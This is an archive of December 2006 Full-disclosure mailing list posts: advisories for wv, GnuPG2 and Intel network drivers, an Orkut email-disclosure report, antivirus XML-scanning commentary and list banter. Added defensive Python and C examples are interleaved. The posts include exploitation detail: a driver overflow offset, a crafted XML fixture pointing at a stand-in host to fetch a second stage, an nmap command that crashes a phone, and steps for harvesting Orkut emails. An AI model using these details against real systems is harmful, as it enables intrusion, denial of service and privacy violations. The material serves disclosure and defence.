- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: wv library: Multiple integer overflows
      Date: December 07, 2006
      Bugs: #153800
        ID: 200612-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The wv library is vulnerable to multiple integer overflows which could
lead to the execution of arbitrary code.

Background
==========

wv is a library for conversion of MS Word DOC and RTF files.
Affected packages
=================

    -------------------------------------------------------------------
     Package       /  Vulnerable  /                         Unaffected
    -------------------------------------------------------------------
  1  app-text/wv       < 1.2.3-r1                           >= 1.2.3-r1

Description
===========

The wv library fails to do proper arithmetic checks in multiple places,
possibly leading to integer overflows.

Impact
======

An attacker could craft a malicious file that, when handled with the wv
library, could lead to the execution of arbitrary code with the
permissions of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All wv library users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/wv-1.2.3-r1"

References
==========

  [ 1 ] CVE-2006-4513
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4513

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200612-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
From xwings.net at gmail.com Thu Dec 7 02:25:22 2006
From: xwings.net at gmail.com (KaiJern Lau)
Date: Thu, 7 Dec 2006 10:25:22 +0800
Subject: [Full-disclosure] Joke, Full Version, 0 day exploit for "PING"

Hi,

Something to share with everyone :)

Still remember the last post that I posted? Sometimes a script kiddie is always a script kiddie. They never want to read; I guess that is the reason why they can't code. After the ping exploit post this fellow did some replies and tried to prove himself. I guess he just doesn't know that all the comments he posted need to be "approved" by me before they come to the page. This morning I got another one from him:

*Before we launch we have to own a lot of boxes, means we have to organize the drones army. Like masters and slaves (zombies). By the way, there is no concept "bypass" in firewall. You cannot bypass the firewall. But you can fool the firewall by legitimate connection, since firewall only work on ip address and port :-). Even if you use IDS or IDP you cannot stop it as long as the attacker is generating legitimate packets. :) Please remember DOS can be protected by updating but there is no IDS/IDP signature to stop the DDOSing. If you go out to real life network you will see there are a lot of hidden devices. In real world, there are a lot of huge networks suffering DDosing everyday. Please remember I also won't attack your low profile network unless someone pays me. I also don't want to tell you guyz how to fool back the attacker bocs' I don't want to share anything with you guyz. If you are a real hacker you won't be saying or swearing anymore. You already own them. The fact that you are boasting on your 0wn blog is you cannot even hack your own box. Bro please grow up.
Hacker never say that he is a hacker. OK?*

First of all, we are talking about exploit development. There is nothing to do with DDOS. Secondly, I guess we all know what DDOS is and how it works. There are a lot of ways; we don't need to own a lot of boxes to DDOS a server. Owning one big site will do. Remember the SWF DDOS? Third, *hacker never say that he is a hacker*: did he mention that he is a hacker too? Lastly, anybody wants his msn id?

------------------------------
Source : http://blog.xwings.net/?p=34

From jan.monsch at iplosion.com Thu Dec 7 16:29:27 2006
From: jan.monsch at iplosion.com (Jan P. Monsch)
Date: Thu, 7 Dec 2006 17:29:27 +0100
Subject: [Full-disclosure] Some Thoughts about Office Open XML and Malware Detection
Message-ID: <010d01c71a1c$e038e520$8210a8c0@moon1>

Hi

Last week I have been googling around for comments and reactions to my report "Malware Detection Rate in Alternative Word Formats" (http://www.iplosion.com/archives/3) which was posted in the ISC diary on August 23rd, 2006 (http://isc.sans.org/diary.php?storyid=1630). To sum it up, there have not been a lot of reactions in magazines or the like, but it got at least the attention of the malware research community. There is this very interesting follow-up article from Christoph Alme in the October 2006 edition of the Virus Bulletin. The two-page article "Scanning Embedded Objects in Word XML Files" (http://www.securecomputing.com/pdf/CAlme_VBOct06.pdf) elaborates how AV products can identify embedded objects in Word XML files. He shows that XML documents can be manipulated slightly, within the flexibility offered in the XML standard, and still be considered valid Word documents. Using the same VirusTotal-based testing method as I did, he demonstrates that all existing AV products can be bypassed.
As you might remember from my initial paper, there were only three AV products capable of finding embedded malware in my run-of-the-mill XML documents. So what does this tell us? The most likely reason is that these three virus scanners do not really understand the XML document format. They most likely have no XML parser integrated, or the parser only implements the XML standard partially. This once again boils down to the conclusion that decoding capability is the name of the game.

Now let us speculate that AV products will integrate a complete off-the-shelf XML parser. Will this help? Well, it will help to properly decode XML documents, but it will most likely introduce new vulnerabilities in AV products so far unheard of. (Actually the motivation for writing this article is to prevent AV vendors from releasing such broken products.) Let us take XML external DTD references as an example. If the XML parsers are used in default configuration or are not configured properly, scanning an XML with an external reference will result in requests to external sites. That is nice. This would allow an attacker to track malware distribution or download additional exploit files to the scanning system.

With the release of Office 2007 a couple of days ago, which will have the Office Open XML format as standard storage format, the urge for XML-enabled AV products will grow. My retesting today shows that the detection rate of Netsky as an embedded object in an Office 2003 Word XML is still at the same level as 3 months ago. I fear that the AV industry is not quite yet ready to protect their customers against XML-delivered attacks.

Kind regards
Jan P. Monsch
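Jan's point about external DTD references can be checked against a real parser. The block below is an added example, not code from the post, from the Virus Bulletin article or from any AV product: a scanning-side XML decoder built on Python's expat binding that reports every external DTD subset and external entity the document asks for and fetches none of them. The sample document, the host `tracker.example`, the function name `scan_xml` and the verdict strings are constructed for the illustration.

```python
"""Decode XML for scanning without ever following an external reference.

Added example, not code from the post or from any AV product. The document,
the host tracker.example and the verdict strings below are constructed.
"""
import xml.parsers.expat as expat

# Constructed sample: a Word-style XML file that points at an external DTD and
# at an external entity on a remote host, the kind of reference that makes a
# carelessly configured scanner phone home.
SAMPLE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE w:wordDocument SYSTEM "http://tracker.example/word.dtd" [
  <!ENTITY payload SYSTEM "http://tracker.example/stage2.bin">
]>
<w:wordDocument xmlns:w="urn:example:word">
  <w:body><w:p>&payload;</w:p></w:body>
</w:wordDocument>
"""

CLEAN_XML = b'<?xml version="1.0"?><doc><p>hello</p></doc>'


def scan_xml(data):
    """Parse data, refusing every external fetch, and report what was requested.

    Returns {'external_refs': [(kind, system_id, public_id), ...],
             'elements': number of start tags seen,
             'verdict': 'decoded' | 'suspicious: ...' | 'malformed: ...'}.
    """
    refs = []
    counter = {"elements": 0}
    parser = expat.ParserCreate()
    # Make expat report the external DTD subset (and external entities) to our
    # handler instead of silently ignoring them. expat itself never opens a
    # system id; the handler decides, and this one always declines.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_UNLESS_STANDALONE)

    def on_external_ref(context, base, system_id, public_id):
        # context is None for the external DTD subset, a string for an entity.
        kind = "external DTD subset" if context is None else "external entity"
        refs.append((kind, system_id, public_id))
        return 1   # 1 = skip the reference without fetching; 0 would abort the parse

    def on_start_element(name, attrs):
        counter["elements"] += 1

    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start_element
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        verdict = "malformed: %s" % exc
    else:
        verdict = "suspicious: document requests external resources" if refs else "decoded"
    return {"external_refs": refs, "elements": counter["elements"], "verdict": verdict}


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_XML), ("clean", CLEAN_XML)):
        print(label, scan_xml(doc))
```

Two things are worth noting. Without the `SetParamEntityParsing` call expat never reports the external subset at all, so a scanner would not even know the document tried; with it, the outcome rests entirely on what the handler does with `system_id`. A handler that opens that URL (Python's own `xml.sax` reader does so once `feature_external_ges` is switched on; it is off by default) is exactly the tracking request the post describes. Returning 1 skips the reference, and a document that asks for remote resources can be treated as a finding in its own right rather than just decoded.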
Monsch From kees at ubuntu.com Thu Dec 7 20:31:39 2006 From: kees at ubuntu.com (Kees Cook) Date: Thu, 7 Dec 2006 12:31:39 -0800 Subject: [Full-disclosure] [USN-393-2] GnuPG2 vulnerabilities Message-ID: <20061207203139.GR6550@outflux.net> =========================================================== Ubuntu Security Notice USN-393-2 December 07, 2006 gnupg2 vulnerabilities CVE-2006-6169, CVE-2006-6235 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.10: gnupg2 1.9.21-0ubuntu5.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-389-1 and USN-393-1 fixed vulnerabilities in gnupg. This update provides the corresponding updates for gnupg2. Original advisory details: A buffer overflow was discovered in GnuPG. By tricking a user into running gpg interactively on a specially crafted message, an attacker could execute arbitrary code with the user's privileges. This vulnerability is not exposed when running gpg in batch mode. (CVE-2006-6169) Tavis Ormandy discovered that gnupg was incorrectly using the stack. If a user were tricked into processing a specially crafted message, an attacker could execute arbitrary code with the user's privileges. 
(CVE-2006-6235) Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2.diff.gz Size/MD5: 39057 24885457e44f2061c1a2ef98047357d4 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2.dsc Size/MD5: 839 5786619a42c6768da183ec2c39d70541 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gnupg2_1.9.21.orig.tar.gz Size/MD5: 2290952 5a609db8ecc661fb299c0dccd84ad503 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg-agent_1.9.21-0ubuntu5.2_amd64.deb Size/MD5: 193748 57618f27a79f42a3e9f66705ed0ab151 http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2_amd64.deb Size/MD5: 787166 9641af8af591a9d61c3d9d77144aa320 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gpgsm_1.9.21-0ubuntu5.2_amd64.deb Size/MD5: 333002 a6d5f35e4fc7dc4c6a837862b269ddc1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg-agent_1.9.21-0ubuntu5.2_i386.deb Size/MD5: 176170 3dc1e0b862fbf76905b61b20132812de http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2_i386.deb Size/MD5: 737818 ab6d004d7fbf1b0850e6f6f4f09771d4 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gpgsm_1.9.21-0ubuntu5.2_i386.deb Size/MD5: 304798 1d6b309f0690685ffa95d219750033dc powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg-agent_1.9.21-0ubuntu5.2_powerpc.deb Size/MD5: 190614 16cd71ed4d92b1203806ba50e638e9e0 http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg2/gnupg2_1.9.21-0ubuntu5.2_powerpc.deb Size/MD5: 773762 56903ee4d39929254b3a4ac06a56a2c5 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg2/gpgsm_1.9.21-0ubuntu5.2_powerpc.deb Size/MD5: 324332 6b9152bd5753f974161c298d6fd6f894 sparc architecture (Sun SPARC/UltraSPARC) 
From rajesh.sethumadhavan at yahoo.com Thu Dec 7 21:04:24 2006
From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan)
Date: Thu, 7 Dec 2006 13:04:24 -0800 (PST)
Subject: [Full-disclosure] Orkut Email Address Disclosure Vulnerability
Message-ID: <960569.53481.qm@web37208.mail.mud.yahoo.com>

Orkut Email Address Disclosure Vulnerability
#####################################################################
XDisclose Advisory : XD100097
Vulnerability Discovered: November 30th 2006
Advisory Released : December 8th 2006
Credit : Rajesh Sethumadhavan
Class : Information Disclosure
Severity : Highly Critical
Solution Status : Unpatched
Vendor : Google Inc
Vendor Website : http://www.orkut.com
Affected applications : Orkut Services
Affected Platform : All
#####################################################################

Overview:

Orkut is an Internet social network service run by Google and named after its creator, Orkut Büyükkökten. It claims to be designed to help users meet new friends and maintain existing relationships with pictures and messages, and establish new ones by reaching out to people you've never met before.

The Orkut service is vulnerable to an email address disclosure vulnerability. Because of this, it is possible to get the email address of any user on Orkut.
This is caused by the improper design of the Orkut portal.

Description:

A remote attacker can get the email address of anyone on Orkut as demonstrated below. Victim interaction is not required at all.

Demonstration:

Note: The demonstration leads to email address information disclosure.

- Log in to your Orkut account
- Add any user as your friend (the person whose email address you want to get)
- Click the 'friends' tab
- Click the 'open friend requests' tab
- Click the edit button; the email address of the user will be displayed as in the screenshot

The same way you can also find your friends' email addresses.

Solution:

Orkut can improve their portal design by hiding users' email addresses.

Screenshot: http://www.xdisclose.com/images/xdorkutemailid.jpg

Impact:

Successful exploitation allows email address disclosure.

Original Advisory: http://www.xdisclose.com/XD100097.txt

Credits:

Rajesh Sethumadhavan has been credited with the discovery of this vulnerability.

Disclaimer:

This entire document is strictly for educational, testing and demonstration purposes only. Modification, use and/or publishing of this information is entirely at your own risk. The exploit code is to be used on your own Orkut account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
From Advisories at eeye.com Thu Dec 7 23:09:15 2006
From: Advisories at eeye.com (eEye Advisories)
Date: Thu, 7 Dec 2006 15:09:15 -0800
Subject: [Full-disclosure] EEYE: Intel Network Adapter Driver Local Privilege Escalation
Message-ID:

eEye Research - http://research.eeye.com

Intel Network Adapter Driver Local Privilege Escalation

Release Date: December 7, 2006
Date Reported: July 10, 2006
Severity: Medium (Local Privilege Escalation to Kernel)

Systems Affected:

Windows 2000, XP, 2003, Vista
  Intel PRO 10/100 - 8.0.27.0 or previous
  Intel PRO/1000 - 8.7.1.0 or previous
  Intel PRO/1000 PCI - 9.1.30.0 or previous
Linux
  Intel PRO 10/100 - 3.5.14 or previous
  Intel PRO/1000 - 7.2.7 or previous
  Intel PRO/10GbE - 1.0.109 or previous
UnixWare/SCO6
  Intel PRO 10/100 - 4.0.3 or previous
  Intel PRO/1000 - 9.0.15 or previous

Overview:

eEye Digital Security has discovered a vulnerability in all Intel network adapter drivers ("NDIS miniport drivers") that could allow unprivileged code executing on an affected system to gain unfettered, kernel-level access. For instance, a malicious user, malware, or an exploit payload taking advantage of an unrelated vulnerability could additionally exploit this vulnerability in order to completely compromise a system at the kernel level. The vulnerability is a simple strcpy-based stack buffer overflow within the Intel miniport driver, and can be reliably exploited on all versions of Windows in order to execute arbitrary code.

Technical Details:

Despite the low level occupied by NDIS miniport drivers, it is possible for unprivileged user-mode code to communicate with them via NDIS-brokered requests for network adapter statistics. An IOCTL_NDIS_QUERY_SELECTED_STATS (0x17000E) request made to "\Device\{adapterguid}" will cause NDIS.SYS to invoke the QueryInformationHandler routine registered by the miniport driver in its call to NdisMRegisterMiniport.
The input buffer supplied with this IOCTL is a list of 32-bit OIDs corresponding to the statistics of interest, each of which is passed individually to QueryInformationHandler, which contains the code necessary to retrieve the statistic and return it in the provided output buffer. In the case of Intel miniport drivers, certain OID handlers will process the contents of the output buffer. On Windows 2000, a pointer to the user-supplied buffer is passed directly to the miniport driver, meaning this data is under user control. (Windows XP and later pass in a pointer to a temporary buffer in kernel memory containing undefined data, which can be controlled by "seeding" pool memory from user mode prior to attempting exploitation.)

The handler for OID 0xFF0203FC attempts to copy a string from the output buffer into a stack variable using essentially the following strcpy operation:

    strcpy(&(var_1D4.sz_62), (char*)InformationBuffer + 4)

Therefore, supplying a 0x17A-character string (at offset +0x0C within the output buffer, because NDIS uses the first 8 bytes for its own purposes) will cause the handler function's return address to be entirely overwritten, allowing execution to be redirected to an arbitrary user- or kernel-mode address.

Despite vendor sentiment to the contrary, it should be understood that driver flaws really are and have always been a major threat. Local exploitation of this vulnerability will result in arbitrary code execution, providing a level of access that amounts to "the keys to the kingdom."

Protection:

Retina - Network Security Scanner has been updated to identify this vulnerability.

Vendor Status:

Intel has released a patch for this vulnerability which is available at http://support.intel.com/support/network/sb/CS-023726.htm.
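As an added example (not eEye's or Intel's code), the bounds-checked form of the handler pattern described above, in C: the declared InformationBufferLength is honoured, the terminator must fall inside it, and the string must fit the destination before anything is copied, so the 0x17A-byte string the advisory describes is rejected instead of written to the stack. The destination size (64 bytes), the status codes, the struct layout and all function and type names are assumptions of this example; the advisory gives the field's name (sz_62), not its size.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Result codes for the handler. Modelled loosely on NDIS_STATUS_* usage,
 * but the names and values here are this example's own. */
typedef enum {
    STATUS_SUCCESS        = 0,
    STATUS_INVALID_LENGTH = 1,
    STATUS_INVALID_DATA   = 2
} handler_status;

/* Per the advisory, the string the handler copies starts 4 bytes past the
 * InformationBuffer pointer it receives (NDIS has already consumed 8). */
#define STRING_OFFSET 4

/* The advisory names the destination sz_62 but gives no size; 64 bytes is
 * an assumption for this example. */
#define DEST_LEN 64

typedef struct {
    uint32_t other_state[8];   /* stand-in for the rest of the handler's locals */
    char     sz[DEST_LEN];     /* the fixed-size destination */
} handler_locals;

/*
 * Original pattern quoted in the advisory, for contrast only:
 *
 *     strcpy(&(var_1D4.sz_62), (char*)InformationBuffer + 4)
 *
 * It never consults InformationBufferLength and copies until the first NUL,
 * so a long enough string runs past sz and over the rest of the frame.
 */

/* Hardened handler. The buffer is treated as untrusted (user-controlled on
 * Windows 2000, attacker-seeded pool contents on XP and later, per the
 * advisory): every read stays inside the declared length and nothing is
 * copied until the string is known to fit, terminator included. */
handler_status copy_checked(handler_locals *loc, const void *InformationBuffer,
                            size_t InformationBufferLength)
{
    if (loc == NULL || InformationBuffer == NULL ||
        InformationBufferLength <= STRING_OFFSET)
        return STATUS_INVALID_LENGTH;          /* no room for any string */

    const char *src   = (const char *)InformationBuffer + STRING_OFFSET;
    size_t      avail = InformationBufferLength - STRING_OFFSET;

    /* Locate the terminator without reading past the declared region. */
    const char *nul = memchr(src, '\0', avail);
    if (nul == NULL)
        return STATUS_INVALID_DATA;            /* unterminated inside bounds */

    size_t len = (size_t)(nul - src);
    if (len >= sizeof loc->sz)
        return STATUS_INVALID_LENGTH;          /* would not fit with its NUL */

    memcpy(loc->sz, src, len + 1);             /* bounded copy, NUL included */
    return STATUS_SUCCESS;
}

/* Builds a constructed request (4 reserved bytes, fill_len bytes of 'A', then
 * an optional NUL inside the declared length) and runs the checked handler.
 * Returns the handler's status and stores the copied length in *copied. */
handler_status run_checked(size_t fill_len, int terminate, size_t *copied)
{
    static uint8_t buf[0x400];
    handler_locals loc;
    size_t total = STRING_OFFSET + fill_len + (terminate ? 1u : 0u);

    if (copied)
        *copied = 0;
    if (total > sizeof buf)
        return STATUS_INVALID_LENGTH;

    memset(buf, 'A', sizeof buf);
    if (terminate)
        buf[STRING_OFFSET + fill_len] = '\0';
    memset(&loc, 0, sizeof loc);

    handler_status st = copy_checked(&loc, buf, total);
    if (st == STATUS_SUCCESS && copied)
        *copied = strlen(loc.sz);
    return st;
}

/* Copied length on success, 0 when the handler rejected the request. */
size_t copied_length(size_t fill_len, int terminate)
{
    size_t n = 0;
    run_checked(fill_len, terminate, &n);
    return n;
}

int main(void)
{
    struct { size_t len; int term; const char *what; } cases[] = {
        { 16,           1, "short terminated string" },
        { DEST_LEN - 1, 1, "longest string that fits" },
        { DEST_LEN,     1, "one byte too long" },
        { 0x17A,        1, "advisory's 0x17A-byte string" },
        { 16,           0, "no terminator within declared length" },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        size_t copied = 0;
        handler_status st = run_checked(cases[i].len, cases[i].term, &copied);
        printf("%-40s -> status %d, copied %zu bytes\n", cases[i].what, st, copied);
    }
    return 0;
}
```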
Credit: Derek Soeder

Related Links:

Retina - Network Security Scanner - Free Trial:
http://www.eeye.com/html/products/retina/download/index.html

Blink - Unified Client Security Personal - Free For Home Use:
http://www.eeye.com/html/products/blink/personal/download/index.html

Blink - Unified Client Security Professional - Free Trial:
http://www.eeye.com/html/products/blink/download/index.html

Greetings:

F1: the very best of luck to you. To Gliko and to Mr. and Mrs. Mike: congrats! cDc for holding the best Vegas party. TA, WC, MF, DKP, DM, BN, MP, CSam, HTP, RS, SY, and the G in GUI.

Copyright (c) 1998-2006 eEye Digital Security

Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert at eEye.com for permission.

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

From ronald at rmacd.com Thu Dec 7 22:07:19 2006
From: ronald at rmacd.com (Ronald MacDonald)
Date: Thu, 7 Dec 2006 22:07:19 +0000
Subject: [Full-disclosure] Orkut Email Address Disclosure Vulnerability
In-Reply-To: <960569.53481.qm@web37208.mail.mud.yahoo.com>
References: <960569.53481.qm@web37208.mail.mud.yahoo.com>
Message-ID: <85963be10612071407u38051d26u5dbcfd327d0e4f5e@mail.gmail.com>

Hi Rajesh,

> Description:
> A remote attacker can get the email address of anyone in the orkut as
> demonstrated below. The victim interaction is not required at all.
>
> Demonstration:
> Note: Demonstration leads to email address information disclosure
> - Login to your orkut account
> - Add any user as your friend (Person you want to get email address)
> - Click 'friends' tab
> - Click 'open friend requests' tab
> - Click edit button the email address of the user will be displayed
> as in the screenshot
> Same way your can find your friends email address also

It's not an 'exploit' but a 'feature' of the portal that Orkut uses on its website, and is no more serious than posting your email address on a mailing list.

Regards,
Ronald.

--
Ronald MacDonald
http://www.rmacd.com/
0777 235 1655

From juha-matti.laurio at netti.fi Fri Dec 8 01:20:11 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Fri, 8 Dec 2006 03:20:11 +0200 (EET)
Subject: [Full-disclosure] Microsoft Word 0-day Vulnerability FAQ (CVE-2006-5994) written
Message-ID: <14768356.1149001165540811806.JavaMail.juha-matti.laurio@netti.fi>

I have posted a Frequently Asked Questions document about the unpatched Microsoft Word zero-day vulnerability. The document, entitled Microsoft Word 0-day Vulnerability FAQ - December 2006, CVE-2006-5994, is located in my SecuriTeam Blogs section, http://blogs.securiteam.com/?p=759

The document also describes the related Trojan downloader malware and the state of the upcoming fix, etc.
Regards,
Juha-Matti Laurio
Finland

From matthew.flaschen at gatech.edu Fri Dec 8 02:38:53 2006
From: matthew.flaschen at gatech.edu (Matthew Flaschen)
Date: Thu, 07 Dec 2006 21:38:53 -0500
Subject: [Full-disclosure] Orkut Email Address Disclosure Vulnerability
In-Reply-To: <85963be10612071407u38051d26u5dbcfd327d0e4f5e@mail.gmail.com>
References: <960569.53481.qm@web37208.mail.mud.yahoo.com> <85963be10612071407u38051d26u5dbcfd327d0e4f5e@mail.gmail.com>
Message-ID: <4578D03D.5020808@gatech.edu>

> It's not an 'exploit' but a 'feature' of the portal that orkut uses on
> its website, and is no more serious than posting your email address on
> a mailing list.

While it's certainly not an exploit, it probably is a bug as well as a feature (like all email disclosure).

Matt

From pingywon at hotmail.com Fri Dec 8 05:21:46 2006
From: pingywon at hotmail.com (pingywon)
Date: Fri, 8 Dec 2006 00:21:46 -0500
Subject: [Full-disclosure] Hail list!
References: <001a01c71907$a4d0c7c0$ee725740$@com> <3da3d8310612062120g1dada3cbjf1bc0f9160dca8c4@mail.gmail.com>
Message-ID:

Have you written a book? You write like an author. I'd read it.

----- Original Message -----
From: "Eliah Kagan"
To:
Sent: Thursday, December 07, 2006 12:20 AM
Subject: Re: [Full-disclosure] Hail list!

> On 12/6/06, aNub15 wrote:
>> 2. Looking for a low footprint windows firewall that's only supposed to
>> do one thing. If someone hits port 110, block the I.P for a week? (should
>> take care of most portscanners (skiddies)). And no I'm not worried about
>> blocking real users on the box.
>
> Has it occurred to you that someone could send spoofed SYN packets
> with port 110 as the destination, and any IP as the source?
> Maybe you should worry about blocking real users after all. If there is an IP
> range where you know you have no legitimate users, you should instead
> block that IP range. Any IP range where you might have legitimate
> users is a range that someone could deny access to easily. Except
> actually it would be you denying access to them--a person attacking
> you in that way would likely not even be legally responsible
> (but I am not a lawyer).
>
> Also, why would that prevent access by most people scanning your
> ports? Suppose someone is scanning your entire subnet, for instance,
> but only on port 22. Or someone could scan lots of ports on your box,
> and notice that plenty were open until 110 was probed. This person
> could then think one of three things:
>
> (1) Hmm, I guess that's all the ports open on that box.
> (2) Hmm, lots of ports open, and then I scan port 110, and the rest
> are all closed/filtered. (This is especially likely if it is the
> person's *second* scan.) There must be something nice and juicy on
> that box. I will scan the rest of the ports from another IP and then
> penetrate any service I can and find out why such a strange measure of
> pseudo-security is in place.
> (3) Hmm, I was reading Full Disclosure recently and somebody was
> asking about how to blacklist IPs for a week that send traffic to port
> 110. I bet this is the box of the guy who wanted to know how to do it.
> Let's find out why he wanted to do that...
>
>> www.supernoia.com
>
> Script kiddies and anybody else who likes portscanning thank you for
> the heads up. If you are going to implement this almost certainly bad
> idea--and it is for that server--you may wish to at least make it a
> different port.
>
> -Eliah
From pingywon at hotmail.com Fri Dec 8 05:25:26 2006
From: pingywon at hotmail.com (pingywon)
Date: Fri, 8 Dec 2006 00:25:26 -0500
Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan
References:
Message-ID:

"The crash
> appears related to PhoneCtl.exe running on the phone's Windows CE 4.2
> operating system."

"Let me take a look at that screenshot again..."

http://www.flickr.com/photos/metalmijn/295348294/

"Heck buddy, you appear correct"

~p

----- Original Message -----
From: "Shawn Merdinger"
To:
Sent: Wednesday, December 06, 2006 1:40 PM
Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan

> Vulnerability Description
> ==================
> The Linksys WIP 330 VoIP wireless phone will crash when a full
> port-range Nmap scan is run against its IP address.
>
>
> Linksys WIP 330 Firmware Version
> ==========================
> 1.00.06A
>
>
> Nmap scan command
> ================
> nmap -P0 -p 1-65535
>
>
> Impact
> =====
> The crash is only after Nmap has finished. The Nmap scan also seems to
> disrupt updating of the display as the clock is not updated. The crash
> appears related to PhoneCtl.exe running on the phone's Windows CE 4.2
> operating system.
>
> Screenshot of the crash: http://www.flickr.com/photos/metalmijn/295348294/
>
>
> Credit
> ====
> Credit for discovering this vulnerability goes to Armijn Hemel

From pingywon at hotmail.com Fri Dec 8 05:29:49 2006
From: pingywon at hotmail.com (pingywon)
Date: Fri, 8 Dec 2006 00:29:49 -0500
Subject: [Full-disclosure] Hail list!
References: <001a01c71907$a4d0c7c0$ee725740$@com>
Message-ID:

That's not to say that there aren't "winblows" boxes internally. But Netcraft only does the webserver, right? Hell, that webserver could even be hosted by a hosting company externally. Rather obvious stuff.

----- Original Message -----
From: "aNub15"
To:
Sent: Wednesday, December 06, 2006 2:24 AM
Subject: [Full-disclosure] Hail list!

> Hail list...
>
> Could someone with a bit more experience (than me) please verify a few
> things.
>
> I came across a job listing yesterday (sys admin) for a Norwegian company
> called rubrikk.no.
> The guy who posted it clearly knows nothing about computers, talking about
> Windows server 2005, and maintaining perl and reg.ex servers (go figure).
>
> I ran a quick scan on the domain and found 54 vulns! (GFI LANguard)
> Netcraft says BSD, but why then is he talking about Winblows?
>
> Please tell me I found a honeypot?
>
> If not, please shut down the computer, it should not be on the internet!!!
>
> ----
>
> I also have a couple of questions about software firewalls/routers:
> 1. M0n0wall or SmoothWall?
> 2. Looking for a low footprint windows firewall that's only supposed to do
> one thing. If someone hits port 110, block the I.P for a week? (should
> take care of most portscanners (skiddies)). And no I'm not worried about
> blocking real users on the box.
>
> Regards
>
> Simon
> www.supernoia.com
From evdo.hsdpa at gmail.com Fri Dec 8 00:21:23 2006
From: evdo.hsdpa at gmail.com (Robert Kim Wireless Internet Advisor)
Date: Thu, 7 Dec 2006 16:21:23 -0800
Subject: [Full-disclosure] Some Thoughts about Office Open XML and Malware Detection
In-Reply-To: <010d01c71a1c$e038e520$8210a8c0@moon1>
References: <010d01c71a1c$e038e520$8210a8c0@moon1>
Message-ID: <1ec620e90612071621i4cb567c1l928b02d3518bdf80@mail.gmail.com>

Jan,

Does full-disclosure need a digg.com style social news and voting site? Let me know; I'd be happy to build one for your community.

See: http://digg.com and http://wimax-coverage.com and http://iptv-coverage.com

On 12/7/06, Jan P. Monsch wrote:
> Hi
>
> Last week I have been googling around for comments and reactions from my
> report "Malware Detection Rate in Alternative Word Formats"
> (http://www.iplosion.com/archives/3) which was posted in the ISC diary on
> August 23rd, 2006 (http://isc.sans.org/diary.php?storyid=1630). To sum it up
> there has not been a lot of reactions in magazines or the like but it got at
> least the attention of the malware research community.
>
> There is this very interesting follow-up article from Christoph Alme in the
> October 2006 edition of the Virus Bulletin. The two page article "Scanning
> Embedded Objects in Word XML Files"
> (http://www.securecomputing.com/pdf/CAlme_VBOct06.pdf) which elaborates how
> AV products can identify embedded objects in Word XML files. He shows that
> XML documents can be manipulated slightly, within the flexibility offered in
> the XML standard, and still are considered valid Word documents. Using the
> same VirusTotal-based testing method as I did, he demonstrates that all
> existing AV products can be bypassed. As you might remember my initial paper
> there were only three AV products capable of finding embedded malware in my
> run-of-the-mill XML documents.
>
> So what does this tell us: The most likely reason is that these three virus
> scanners do not really understand XML document format. They most likely have
> no XML parser integrated or the parser only implements the XML standard
> partially. This once again melts down to the conclusion that the decoding
> capability is the name of the game.
>
> Now let us speculate that AV products will integrate a complete
> off-the-shelf XML parser. Will this help? Well it will help to properly
> decode XML documents but it will most likely introduce new vulnerabilities
> in AV products so far unheard of. (Actually the motivation I am writing this
> article is to prevent AV vendors to release such broken products). Let us
